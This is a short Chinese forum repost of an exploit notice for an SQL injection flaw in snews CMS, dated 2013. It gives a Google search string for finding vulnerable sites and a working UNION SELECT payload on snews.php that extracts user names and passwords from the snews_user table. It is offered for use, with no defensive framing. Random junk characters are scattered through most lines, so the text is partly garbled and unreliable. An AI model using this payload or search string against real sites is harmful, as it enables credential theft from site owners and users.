标题: CMS snews SQL Injection Vulnerability
' c3 m1 m7 X; m/ B% p" p+ C0 ?作者: By onestree
) e2 k) ^* y5 I8 [& F( O5 x7 X下载地址 : http://snewscms.com/+ e( u \2 M# c+ \" ?
测试平台 : ubuntu 12.10 / win 7) T" r) ?6 L4 D3 @) ` |; v! |- h
关键词: inurl:"tanyakan pada rumput yang bergoyang"# s/ L% |+ w5 z7 _" A6 L
$ S, M' ^3 T9 d) f) n4 q+ {9 p: J
6 e O" j( W& @; {# q ~+ v*************************************************************: l0 G* _& i& W" A/ u
$ I* E H+ V8 @$ L
SQL poc:
$ g7 M' {' d5 B2 n( P" F9 u+ b , q: \- g3 W- ~& [2 y2 u) `" r
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]2 H6 `: H, l& w. ?" @
+ k$ C# K6 b0 b示例
5 _( \0 P+ D3 J' ]* M% n
: Y$ P+ {' i: E6 Z! l& lhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*4 U7 T+ e* ?1 m
4 ^2 ?0 @7 t+ L0 @ ' [( Y% z7 S8 l f: h2 \
致谢:
5 q2 j6 h0 X/ { . p0 |# D+ l/ @- T& [
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell# Z$ t( j, u$ c
" W: ]5 t. P! o, e: g( B indonesiancoder - moeslimh4x0r - go-coder
9 N$ d8 Y9 k7 Z4 b) S+ e
! B5 I2 e0 |+ c9 J& a! i& w- a' kspesial my hunny :*
* a% V: @7 J3 B1 v/ t2 g5 u |
发表于 2013-1-23 08:55:06
收藏
支持
反对